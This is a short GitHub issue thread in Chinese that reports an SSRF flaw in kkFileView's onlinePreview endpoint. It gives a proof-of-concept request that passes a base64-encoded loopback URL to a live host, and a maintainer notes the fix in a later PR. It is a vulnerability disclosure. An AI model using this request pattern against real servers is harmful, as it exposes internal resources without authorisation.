### ISSUE TITLE
SSRF vulnerability

### ISSUE THREAD

**Issue by LandGrey** [kekingcn/kkFileView#296]
将地址
```
http://127.0.0.1:8012/demo/book.txt
```` 
base64 编码成 
```
aHR0cDovLzEyNy4wLjAuMTo4MDEyL2RlbW8vYm9vay50eHQ=
```
然后访问
```
https://file.keking.cn/onlinePreview?url=aHR0cDovLzEyNy4wLjAuMTo4MDEyL2RlbW8vYm9vay50eHQ=
```

可以正常访问到 `https://file.keking.cn/demo/book.txt` 的内容，没有对访问地址做安全限制，存在 ssrf 漏洞 

![image](https://user-images.githubusercontent.com/16769779/137617407-d76bc876-a451-4888-9af2-a2d8a491f86f.png)

**Comment by gitchenjh** [comment]
这个PR 已习修复 #309
